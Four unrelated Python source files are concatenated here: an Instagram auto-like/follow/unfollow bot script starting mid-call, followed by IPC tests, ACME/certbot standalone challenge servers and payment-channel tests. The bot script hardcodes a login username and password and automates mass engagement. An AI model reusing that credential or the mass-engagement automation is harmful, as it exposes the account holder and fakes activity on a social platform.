whitelist_file=config_file.WHITELIST_FILE,
friends_file=config_file.FRIENDS_FILE,
followed_file='followed.txt',
unfollowed_file='unfollowed.txt',
skipped_file='skipped.txt',
proxy=None,
max_likes_per_day=1000,
max_unlikes_per_day=1000,
max_follows_per_day=300,
max_unfollows_per_day=350,
max_comments_per_day=0,
max_blocks_per_day=0,
max_unblocks_per_day=0,
max_likes_to_like=450,
max_messages_per_day=0,
filter_users=True,
filter_previously_followed=False,
filter_business_accounts=False,
filter_verified_accounts=True,
max_followers_to_follow=3500,
min_followers_to_follow=40,
max_following_to_follow=10000,
min_following_to_follow=10,
max_followers_to_following_ratio=10,
max_following_to_followers_ratio=2,
min_media_count_to_follow=3,
max_following_to_block=2000,
like_delay=1,
unlike_delay=10,
follow_delay=130,
unfollow_delay=130,
comment_delay=60,
block_delay=30,
unblock_delay=30,
message_delay=60,
stop_words=(),
verbosity=True,
)
bot.login(username="stefano.nature", password="maziamazia97")
bot.logger.info("LIKE SCRIPT")
f = open("hashtag_database.txt", 'r')
hashtag_file_like_list = [f.read().split('\n')]
random_user_file = utils.file(config_file.USERS_FILE)
random_hashtag_file_like = utils.file(config_file.HASHTAGS_FILE_LIKE)
random_hashtag_file_follow = utils.file(config_file.HASHTAGS_FILE_FOLLOW)
photo_captions_file = utils.file(config_file.PHOTO_CAPTIONS_FILE)
posted_pic_list = utils.file(config_file.POSTED_PICS_FILE).list
pics = sorted([os.path.basename(x) for x in
glob(config_file.PICS_PATH + "/*.jpg")])
def stats():
print("stats")
#bot.save_user_stats(bot.user_id)
def like_hashtags():
print("like_hashtag")
bot.like_hashtag(random_hashtag_file_like.random(), amount=50)
def like_timeline():
print("like_timeline")
bot.like_timeline(amount=20)
def like_user_followers():
print("like_user_followers")
bot.like_followers("sebastianochiari", nlikes=3, nfollows=1)
def like_followers_from_random_user_file():
print("like_from_hashtag")
#bot.like_followers(random_user_file.random(), nlikes=3)
def follow_followers():
print("follow")
#bot.follow_followers(random_user_file.random(), nfollows=config.NUMBER_OF_FOLLOWERS_TO_FOLLOW)
def comment_medias():
bot.comment_medias(bot.get_timeline_medias())
def unfollow_non_followers():
print("unfollow")
bot.unfollow_non_followers(n_to_unfollows=config_file.NUMBER_OF_NON_FOLLOWERS_TO_UNFOLLOW)
def unfollow_everyone():
print("unfollow_everyone")
# a = bot.delays
# valore = a['unfollow']
# a['unfollow'] = 100
bot.unfollow_everyone()
#a['unfollow'] = valore
def follow_users_from_hastag_file():
print("follow da file hashtag")
print(config_file.BLOCK)
if config_file.BLOCK:
print("non seguo nessuno")
else:
print("inizio a seguire")
bot.follow_users(bot.get_hashtag_users(random_hashtag_file_follow.random())[:20])
def block_follow():
print("blocca follow")
config_file.BLOCK = True
print(config_file.BLOCK)
def allow_follow():
print("allow follow")
config_file.BLOCK = False
print(config_file.BLOCK)
def comment_hashtag():
hashtag = random_hashtag_file_like.random()
bot.logger.info("Commenting on hashtag: " + hashtag)
bot.comment_hashtag(hashtag)
def upload_pictures(): # Automatically post a pic in 'pics' folder
try:
for pic in pics:
if pic in posted_pic_list:
continue
caption = photo_captions_file.random()
full_caption = caption + "\n" + config_file.FOLLOW_MESSAGE
bot.logger.info("Uploading pic with caption: " + caption)
bot.upload_photo(config_file.PICS_PATH + pic, caption=full_caption)
if bot.api.last_response.status_code != 200:
bot.logger.error("Something went wrong, read the following ->\n")
bot.logger.error(bot.api.last_response)
break
if pic not in posted_pic_list:
# After posting a pic, comment it with all the hashtags specified
# In config.PICS_HASHTAGS
posted_pic_list.append(pic)
with open('pics.txt', 'a') as f:
f.write(pic + "\n")
bot.logger.info("Succesfully uploaded: " + pic)
bot.logger.info("Commenting uploaded photo with hashtags...")
medias = bot.get_your_medias()
last_photo = medias[0] # Get the last photo posted
bot.comment(last_photo, config_file.PICS_HASHTAGS)
break
except Exception as e:
bot.logger.error("Couldn't upload pic")
bot.logger.error(str(e))
def put_non_followers_on_blacklist(): # put non followers on blacklist
try:
bot.logger.info("Creating non-followers list")
followings = set(bot.following)
followers = set(bot.followers)
friends = bot.friends_file.set # same whitelist (just user ids)
non_followers = followings - followers - friends
for user_id in non_followers:
bot.blacklist_file.append(user_id, allow_duplicates=False)
bot.logger.info("Done.")
except Exception as e:
bot.logger.error("Couldn't update blacklist")
bot.logger.error(str(e))
def put_following_in_whitelist(): # put non followers on blacklist
try:
bot.logger.info("Creating whitelist")
followings = set(bot.following)
for user_id in followings:
bot.whitelist_file.append(user_id, allow_duplicates=False)
bot.logger.info("Done.")
except Exception as e:
bot.logger.error("Couldn't update blacklist")
bot.logger.error(str(e))
def run_threaded(job_fn):
job_thread = threading.Thread(target=job_fn)
job_thread.start()
like_hashtags()
#while True:
# schedule.run_pending()
# time.sleep(1)
|
test_ipc.py | import abc
import itertools
import multiprocessing
import sys
import textwrap
import time
import traceback
from typing import Any, List, Optional, cast
import pytest
import determined as det
from determined import core, ipc
from tests import parallel
class Subproc(multiprocessing.Process):
"""
Subproc executes an abstract main(), returning the stacktrace as a string in join().
"""
def __init__(self, *arg: Any, **kwarg: Any):
self._error_queue = multiprocessing.Queue() # type: Any
super().__init__(*arg, **kwarg)
def run(self) -> None:
try:
self.main()
except Exception:
self._error_queue.put(traceback.format_exc())
def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]:
super().join(*args, **kwargs)
if not self._error_queue.empty():
return cast(str, self._error_queue.get())
return None
@abc.abstractmethod
def main(self) -> None:
pass
class SubprocGroup(list):
"""
SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs.
"""
def join_all(self) -> None:
# Every process should be joinable within one second.
errors = [subproc.join_and_check() for subproc in self]
# Terminate any processes which did not exit in time.
num_unterminated = 0
for subproc in self:
if subproc.is_alive():
subproc.terminate()
subproc.join()
num_unterminated += 1
assert num_unterminated == 0
# Make sure none of the processes raised an error.
errors = [e for e in errors if e is not None]
if len(errors):
print("Traceback from child process:", file=sys.stderr)
print(textwrap.indent(errors[0], "|"), file=sys.stderr)
raise AssertionError("failure in child process")
def __enter__(self) -> "SubprocGroup":
for subproc in self:
subproc.start()
return self
def __exit__(self, *_: Any) -> None:
self.join_all()
class BroadcastClientSubproc(Subproc):
def __init__(
self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int]
) -> None:
self._rank = rank
self._size = size
self._pub_url = pub_url
self._pull_url = pull_url
self._exp_msgs = exp_msgs
super().__init__()
def main(self) -> None:
with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client:
# Start the server-client communication test.
broadcast_client.safe_start()
for exp in self._exp_msgs:
msg = broadcast_client.recv()
assert msg == exp
broadcast_client.send(2 * msg)
def test_broadcast_server_client() -> None:
num_subprocs = 3
with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server:
pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}"
pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}"
msgs = list(range(10))
with SubprocGroup(
BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs)
for i in range(num_subprocs)
):
broadcast_server.safe_start()
for msg in msgs:
broadcast_server.broadcast(msg)
gathered = broadcast_server.gather()
assert all(g == 2 * msg for g in gathered)
@pytest.mark.parametrize("cross_size", [1, 4])
@pytest.mark.parametrize("local_size", [1, 4])
@pytest.mark.parametrize("force_tcp", [False, True])
def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None:
size = cross_size * local_size
# Make sure `make test` doesn't hang on macbook's default values. Avoid skipping on linux
# because it's not a common default, and to avoid false positives in CI.
if sys.platform == "darwin" and size == 16:
import resource
if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 1024:
pytest.skip(
"increase the open fd limit with `ulimit -n 1024` or greater to run this test"
)
with parallel.Execution(size, local_size=local_size, make_distributed_context=False) as pex:
@pex.run
def contexts() -> core.DistributedContext:
return core.DistributedContext(
rank=pex.rank,
size=pex.size,
local_rank=pex.local_rank,
local_size=pex.local_size,
cross_rank=pex.cross_rank,
cross_size=pex.cross_size,
chief_ip="localhost",
force_tcp=force_tcp,
)
# Perform a broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast(pex.rank)) # type: ignore
assert results == [0] * size, "not all threads ran broadcast correctly"
# Perform a local broadcast.
results = pex.run(lambda: contexts[pex.rank].broadcast_local(pex.rank))
expect = [rank - (rank % local_size) for rank in range(size)] # type: Any
assert results == expect, "not all threads ran broadcast_local correctly"
# Perform a gather.
results = pex.run(lambda: set(contexts[pex.rank].gather(pex.rank) or []))
chief = set(range(size))
expect = [set(range(size)) if rank == 0 else set() for rank in range(size)]
assert results == [chief] + [set()] * (size - 1), "not all threads ran gather correctly"
# Perform a local gather.
results = pex.run(lambda: set(contexts[pex.rank].gather_local(pex.rank) or []))
expect = [
set(range(rank, rank + local_size)) if rank % local_size == 0 else set()
for rank in range(size)
]
assert results == expect, "not all threads ran gather correctly"
# Perform an allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather(pex.rank)))
expect = set(range(size))
assert results == [expect] * size, "not all threads ran allgather correctly"
# Perform a local allgather.
results = pex.run(lambda: set(contexts[pex.rank].allgather_local(pex.rank)))
expect = [
set(range(cross_rank * local_size, (cross_rank + 1) * local_size))
for cross_rank, _ in itertools.product(range(cross_size), range(local_size))
]
assert results == expect, "not all threads ran allgather_local correctly"
# Close all contexts.
for context in contexts:
context.close()
class TestPIDServer:
@staticmethod
def _worker_proc(
addr: int,
keep_alive: bool = False,
sleep_time: float = 10,
repeat: int = 1,
crash: bool = False,
) -> None:
with ipc.PIDClient(addr) as pid_client:
for _ in range(repeat):
if keep_alive:
pid_client.keep_alive()
time.sleep(sleep_time)
if crash:
raise ValueError("Crashing...")
def test_normal_execution(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
procs = [
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
),
]
for p in procs:
p.start()
pid_server.run()
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 2
def test_worker_crashes(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_return_code_on_worker_error(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
# Enforce that the crashed worker causes the exit before the other worker exits.
deadline = time.time() + 20
# Enforce that run_subprocess exits nonzero on a worker failure, even if the main
# subprocess exits zero.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
error_code = pid_server.run_subprocess(["sleep", "2"])
assert error_code == 79
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
def test_health_check_pre_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
# Only one worker to guarantee a failed healthcheck before all workers have connected.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_health_check_post_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_single_worker_failure_is_caught(self) -> None:
# This is a regression test; there used to be a codepath where we would stop checking pid's
# after the last pidclient disconnected, even if it disconnected with a failure.
with ipc.PIDServer(addr=0, num_clients=1) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
p = multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
)
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
p.terminate()
p.join()
|
standalone.py | """Support for standalone client challenge solvers. """
import collections
import functools
import http.client as http_client
import http.server as BaseHTTPServer
import logging
import socket
import socketserver
import threading
from typing import Any
from typing import cast
from typing import List
from typing import Mapping
from typing import Optional
from typing import Set
from typing import Tuple
from typing import Type
from OpenSSL import crypto
from OpenSSL import SSL
from acme import challenges
from acme import crypto_util
logger = logging.getLogger(__name__)
class TLSServer(socketserver.TCPServer):
"""Generic TLS Server."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
self.certs = kwargs.pop("certs", {})
self.method = kwargs.pop("method", crypto_util._DEFAULT_SSL_METHOD)
self.allow_reuse_address = kwargs.pop("allow_reuse_address", True)
super().__init__(*args, **kwargs)
def _wrap_sock(self) -> None:
self.socket = cast(socket.socket, crypto_util.SSLSocket(
self.socket, cert_selection=self._cert_selection,
alpn_selection=getattr(self, '_alpn_selection', None),
method=self.method))
def _cert_selection(self, connection: SSL.Connection
) -> Tuple[crypto.PKey, crypto.X509]: # pragma: no cover
"""Callback selecting certificate for connection."""
server_name = connection.get_servername()
return self.certs.get(server_name, None)
def server_bind(self) -> None:
self._wrap_sock()
return socketserver.TCPServer.server_bind(self)
class ACMEServerMixin:
"""ACME server common settings mixin."""
# TODO: c.f. #858
server_version = "ACME client standalone challenge solver"
allow_reuse_address = True
class BaseDualNetworkedServers:
"""Base class for a pair of IPv6 and IPv4 servers that tries to do everything
it's asked for both servers, but where failures in one server don't
affect the other.
If two servers are instantiated, they will serve on the same port.
"""
def __init__(self, ServerClass: Type[socketserver.TCPServer], server_address: Tuple[str, int],
*remaining_args: Any, **kwargs: Any) -> None:
port = server_address[1]
self.threads: List[threading.Thread] = []
self.servers: List[socketserver.BaseServer] = []
# Preserve socket error for re-raising, if no servers can be started
last_socket_err: Optional[socket.error] = None
# Must try True first.
# Ubuntu, for example, will fail to bind to IPv4 if we've already bound
# to IPv6. But that's ok, since it will accept IPv4 connections on the IPv6
# socket. On the other hand, FreeBSD will successfully bind to IPv4 on the
# same port, which means that server will accept the IPv4 connections.
# If Python is compiled without IPv6, we'll error out but (probably) successfully
# create the IPv4 server.
for ip_version in [True, False]:
try:
kwargs["ipv6"] = ip_version
new_address = (server_address[0],) + (port,) + server_address[2:]
new_args = (new_address,) + remaining_args
server = ServerClass(*new_args, **kwargs)
logger.debug(
"Successfully bound to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
except socket.error as e:
last_socket_err = e
if self.servers:
# Already bound using IPv6.
logger.debug(
"Certbot wasn't able to bind to %s:%s using %s, this "
"is often expected due to the dual stack nature of "
"IPv6 socket implementations.",
new_address[0], new_address[1],
"IPv6" if ip_version else "IPv4")
else:
logger.debug(
"Failed to bind to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
else:
self.servers.append(server)
# If two servers are set up and port 0 was passed in, ensure we always
# bind to the same port for both servers.
port = server.socket.getsockname()[1]
if not self.servers:
if last_socket_err:
raise last_socket_err
else: # pragma: no cover
raise socket.error("Could not bind to IPv4 or IPv6.")
def serve_forever(self) -> None:
"""Wraps socketserver.TCPServer.serve_forever"""
for server in self.servers:
thread = threading.Thread(
target=server.serve_forever)
thread.start()
self.threads.append(thread)
def getsocknames(self) -> List[Tuple[str, int]]:
"""Wraps socketserver.TCPServer.socket.getsockname"""
return [server.socket.getsockname() for server in self.servers]
def shutdown_and_server_close(self) -> None:
"""Wraps socketserver.TCPServer.shutdown, socketserver.TCPServer.server_close, and
threading.Thread.join"""
for server in self.servers:
server.shutdown()
server.server_close()
for thread in self.threads:
thread.join()
self.threads = []
class TLSALPN01Server(TLSServer, ACMEServerMixin):
"""TLSALPN01 Server."""
ACME_TLS_1_PROTOCOL = b"acme-tls/1"
def __init__(self, server_address: Tuple[str, int],
certs: List[Tuple[crypto.PKey, crypto.X509]],
challenge_certs: Mapping[str, Tuple[crypto.PKey, crypto.X509]],
ipv6: bool = False) -> None:
TLSServer.__init__(
self, server_address, _BaseRequestHandlerWithLogging, certs=certs,
ipv6=ipv6)
self.challenge_certs = challenge_certs
def _cert_selection(self, connection: SSL.Connection) -> Tuple[crypto.PKey, crypto.X509]:
# TODO: We would like to serve challenge cert only if asked for it via
# ALPN. To do this, we need to retrieve the list of protos from client
# hello, but this is currently impossible with openssl [0], and ALPN
# negotiation is done after cert selection.
# Therefore, currently we always return challenge cert, and terminate
# handshake in alpn_selection() if ALPN protos are not what we expect.
# [0] https://github.com/openssl/openssl/issues/4952
server_name = connection.get_servername()
logger.debug("Serving challenge cert for server name %s", server_name)
return self.challenge_certs[server_name]
def _alpn_selection(self, _connection: SSL.Connection, alpn_protos: List[bytes]) -> bytes:
"""Callback to select alpn protocol."""
if len(alpn_protos) == 1 and alpn_protos[0] == self.ACME_TLS_1_PROTOCOL:
logger.debug("Agreed on %s ALPN", self.ACME_TLS_1_PROTOCOL)
return self.ACME_TLS_1_PROTOCOL
logger.debug("Cannot agree on ALPN proto. Got: %s", str(alpn_protos))
# Explicitly close the connection now, by returning an empty string.
# See https://www.pyopenssl.org/en/stable/api/ssl.html#OpenSSL.SSL.Context.set_alpn_select_callback # pylint: disable=line-too-long
return b""
class HTTPServer(BaseHTTPServer.HTTPServer):
"""Generic HTTP Server."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
super().__init__(*args, **kwargs)
class HTTP01Server(HTTPServer, ACMEServerMixin):
"""HTTP01 Server."""
def __init__(self, server_address: Tuple[str, int], resources: Set[challenges.HTTP01],
ipv6: bool = False, timeout: int = 30) -> None:
super().__init__(
server_address, HTTP01RequestHandler.partial_init(
simple_http_resources=resources, timeout=timeout), ipv6=ipv6)
class HTTP01DualNetworkedServers(BaseDualNetworkedServers):
"""HTTP01Server Wrapper. Tries everything for both. Failures for one don't
affect the other."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(HTTP01Server, *args, **kwargs)
class HTTP01RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""HTTP01 challenge handler.
Adheres to the stdlib's `socketserver.BaseRequestHandler` interface.
:ivar set simple_http_resources: A set of `HTTP01Resource`
objects. TODO: better name?
"""
HTTP01Resource = collections.namedtuple(
"HTTP01Resource", "chall response validation")
def __init__(self, *args: Any, **kwargs: Any) -> None:
self.simple_http_resources = kwargs.pop("simple_http_resources", set())
self._timeout = kwargs.pop('timeout', 30)
super().__init__(*args, **kwargs)
self.server: HTTP01Server
# In parent class BaseHTTPRequestHandler, 'timeout' is a class-level property but we
# need to define its value during the initialization phase in HTTP01RequestHandler.
# However MyPy does not appreciate that we dynamically shadow a class-level property
# with an instance-level property (eg. self.timeout = ... in __init__()). So to make
# everyone happy, we statically redefine 'timeout' as a method property, and set the
# timeout value in a new internal instance-level property _timeout.
@property
def timeout(self) -> int: # type: ignore[override]
"""
The default timeout this server should apply to requests.
:return: timeout to apply
:rtype: int
"""
return self._timeout
def log_message(self, format: str, *args: Any) -> None: # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self) -> None:
"""Handle request."""
self.log_message("Incoming request")
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
def do_GET(self) -> None: # pylint: disable=invalid-name,missing-function-docstring
if self.path == "/":
self.handle_index()
elif self.path.startswith("/" + challenges.HTTP01.URI_ROOT_PATH):
self.handle_simple_http_resource()
else:
self.handle_404()
def handle_index(self) -> None:
"""Handle index page."""
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.end_headers()
self.wfile.write(self.server.server_version.encode())
def handle_404(self) -> None:
"""Handler 404 Not Found errors."""
self.send_response(http_client.NOT_FOUND, message="Not Found")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"404")
def handle_simple_http_resource(self) -> None:
"""Handle HTTP01 provisioned resources."""
for resource in self.simple_http_resources:
if resource.chall.path == self.path:
self.log_message("Serving HTTP01 with token %r",
resource.chall.encode("token"))
self.send_response(http_client.OK)
self.end_headers()
self.wfile.write(resource.validation.encode())
return
else: # pylint: disable=useless-else-on-loop
self.log_message("No resources to serve")
self.log_message("%s does not correspond to any resource. ignoring",
self.path)
@classmethod
def partial_init(cls, simple_http_resources: Set[challenges.HTTP01],
timeout: int) -> 'functools.partial[HTTP01RequestHandler]':
"""Partially initialize this handler.
This is useful because `socketserver.BaseServer` takes
uninitialized handler and initializes it with the current
request.
"""
return functools.partial(
cls, simple_http_resources=simple_http_resources,
timeout=timeout)
class _BaseRequestHandlerWithLogging(socketserver.BaseRequestHandler):
"""BaseRequestHandler with logging."""
def log_message(self, format: str, *args: Any) -> None: # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self) -> None:
"""Handle request."""
self.log_message("Incoming request")
socketserver.BaseRequestHandler.handle(self)
|
test_channels.py | """Tests for payment channel functionality."""
import time
import codecs
import pytest
import collections
import multiprocessing
import two1.bitcoin.utils as utils
from two1.bitcoin import Script, Hash
from two1.bitcoin import PrivateKey
from two1.bitcoin import Transaction, TransactionInput, TransactionOutput
from two1.channels.statemachine import PaymentChannelRedeemScript
from two1.bitserv.payment_server import PaymentServer, PaymentServerError
from two1.bitserv.payment_server import PaymentChannelNotFoundError
from two1.bitserv.payment_server import TransactionVerificationError
from two1.bitserv.payment_server import BadTransactionError
from two1.bitserv.models import DatabaseSQLite3, ChannelSQLite3
class MockTwo1Wallet:
"""Wallet to mock two1 wallet functions in a test environment."""
def __init__(self):
"""Initialize the mock wallet with a private key."""
self._private_key = PrivateKey.from_random()
self.testnet = False
def get_payout_public_key(self, account='default'):
"""Return the public key associated with the private key."""
return self._private_key.public_key
def get_private_for_public(self, public_key):
"""Get this private key for this public key."""
if public_key.to_hex() == self._private_key.public_key.to_hex():
return self._private_key
else:
return None
def create_deposit_tx(self, hash160):
"""Return a mocked deposit transaction."""
utxo_script_sig = Script.build_p2pkh(self._private_key.public_key.hash160())
inp = TransactionInput(
outpoint=Hash('0' * 64), outpoint_index=0, script=utxo_script_sig, sequence_num=0xffffffff)
out = TransactionOutput(value=100000, script=Script.build_p2sh(hash160))
txn = Transaction(version=Transaction.DEFAULT_TRANSACTION_VERSION, inputs=[inp], outputs=[out], lock_time=0)
txn.sign_input(
input_index=0, hash_type=Transaction.SIG_HASH_ALL, private_key=self._private_key,
sub_script=utxo_script_sig)
return txn
def create_payment_tx(self, deposit_tx, redeem_script, merchant_public_key,
customer_public_key, amount, fee):
# Find P2SH output index in deposit_tx
deposit_utxo_index = deposit_tx.output_index_for_address(redeem_script.hash160())
# Look up deposit amount
deposit_amount = deposit_tx.outputs[deposit_utxo_index].value - fee
# Build unsigned payment transaction
script_sig = Script()
inp = TransactionInput(deposit_tx.hash, deposit_utxo_index, script_sig, 0xffffffff)
out1 = TransactionOutput(amount, Script.build_p2pkh(merchant_public_key.hash160()))
out2 = TransactionOutput(deposit_amount - amount, Script.build_p2pkh(customer_public_key.hash160()))
payment_tx = Transaction(1, [inp], [out1, out2], 0x0)
# Sign payment transaction
public_key = redeem_script.customer_public_key
private_key = self.get_private_for_public(public_key)
sig = payment_tx.get_signature_for_input(0, Transaction.SIG_HASH_ALL, private_key, redeem_script)[0]
# Update input script sig
script_sig = Script(
[sig.to_der() + utils.pack_compact_int(Transaction.SIG_HASH_ALL), 'OP_1', bytes(redeem_script)])
payment_tx.inputs[0].script = script_sig
return payment_tx
class MockBlockchain:
def broadcast_tx(self, tx):
pass
def lookup_spend_txid(self, txid, output_index):
return None
def check_confirmed(self, txid, num_confirmations=1):
return True
def mock_lookup_spent_txid(self, txid, output_index):
return txid
###############################################################################
ClientVals = collections.namedtuple('ClientVals', ['deposit_tx', 'payment_tx', 'redeem_script'])
TEST_DEP_AMOUNT = 100000
TEST_DUST_AMOUNT = 1
TEST_PMT_AMOUNT = 5000
TEST_FEE_AMOUNT = 10000
TEST_EXPIRY = 86400
cust_wallet = MockTwo1Wallet()
merch_wallet = MockTwo1Wallet()
BAD_SIGNATURE = codecs.encode(cust_wallet._private_key.sign('fake').to_der(), 'hex_codec')
channel_server = PaymentServer(merch_wallet, testnet=True)
channel_server._blockchain = MockBlockchain()
def _create_client_txs():
"""Mock client transactions for opening a channel."""
# Collect public keys
expiration_time = int(time.time() + TEST_EXPIRY)
customer_public_key = cust_wallet.get_payout_public_key()
merchant_public_key = merch_wallet.get_payout_public_key()
# Build redeem script
redeem_script = PaymentChannelRedeemScript(
merchant_public_key, customer_public_key, expiration_time)
# Build deposit tx
deposit_tx = cust_wallet.create_deposit_tx(redeem_script.hash160())
# Build payment tx
payment_tx = cust_wallet.create_payment_tx(
deposit_tx, redeem_script, merchant_public_key,
customer_public_key, TEST_PMT_AMOUNT, TEST_FEE_AMOUNT)
return ClientVals(deposit_tx.to_hex(), payment_tx.to_hex(), redeem_script.to_hex())
def _create_client_payment(client, num):
"""Mock client transaction for a payment in a channel."""
customer_public_key = cust_wallet.get_payout_public_key()
merchant_public_key = merch_wallet.get_payout_public_key()
deposit_tx = Transaction.from_hex(client.deposit_tx)
redeem_script = PaymentChannelRedeemScript.from_bytes(codecs.decode(client.redeem_script, 'hex_codec'))
return cust_wallet.create_payment_tx(
deposit_tx, redeem_script, merchant_public_key, customer_public_key,
TEST_PMT_AMOUNT * num, TEST_FEE_AMOUNT).to_hex()
def test_identify():
"""Test ability to identify a payment server."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
pc_config = channel_server.identify()
merchant_public_key = pc_config['public_key']
test_public_key = codecs.encode(
merch_wallet._private_key.public_key.compressed_bytes,
'hex_codec').decode('utf-8')
assert merchant_public_key == test_public_key
assert pc_config['version'] == channel_server.PROTOCOL_VERSION
assert pc_config['zeroconf'] is False
def test_channel_server_open():
"""Test ability to open a payment channel."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
test_client = _create_client_txs()
# Initialize the handshake and ensure that it returns sucessfully
channel_server.open(test_client.deposit_tx, test_client.redeem_script)
# Test for handshake failure when using the same refund twice
with pytest.raises(PaymentServerError):
channel_server.open(test_client.deposit_tx, test_client.redeem_script)
def test_receive_payment():
"""Test ability to receive a payment within a channel."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
test_client = _create_client_txs()
# Test that payment receipt fails when no channel exists
with pytest.raises(PaymentChannelNotFoundError):
channel_server.receive_payment('fake', test_client.payment_tx)
# Initiate and complete the payment channel handshake
deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
# Test that payment receipt succeeds
channel_server.receive_payment(deposit_txid, test_client.payment_tx)
# Test that payment receipt fails with a duplicate payment
with pytest.raises(PaymentServerError):
channel_server.receive_payment(deposit_txid, test_client.payment_tx)
def test_redeem_payment():
"""Test ability to redeem a payment made within a channel."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
test_client = _create_client_txs()
# Test that payment redeem fails when no channel exists
with pytest.raises(PaymentChannelNotFoundError):
channel_server.redeem('fake')
# Test that payment redeem succeeds
deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
amount = channel_server.redeem(payment_txid)
assert amount == TEST_PMT_AMOUNT
# Test that payment redeem fails with a duplicate payment
with pytest.raises(PaymentServerError):
channel_server.redeem(payment_txid)
def test_status_close_channel():
"""Test ability to get a channel's status and close it."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
test_client = _create_client_txs()
# Test that channel close fails when no channel exists
with pytest.raises(PaymentChannelNotFoundError):
channel_server.close('fake', BAD_SIGNATURE)
# Open the channel and make a payment
deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
channel_server.redeem(payment_txid)
# Test that channel close fails without a valid signature
with pytest.raises(TransactionVerificationError):
closed = channel_server.close(deposit_txid, BAD_SIGNATURE)
# Test that channel close succeeds
good_signature = codecs.encode(cust_wallet._private_key.sign(deposit_txid).to_der(), 'hex_codec')
closed = channel_server.close(deposit_txid, good_signature)
assert closed
def test_channel_sync(monkeypatch):
"""Test ability to sync the status of all channels."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
# Seed the database with activity in Channel A
test_client_a = _create_client_txs()
deposit_txid_a = channel_server.open(test_client_a.deposit_tx, test_client_a.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid_a, test_client_a.payment_tx)
amount = channel_server.redeem(payment_txid)
assert amount == TEST_PMT_AMOUNT
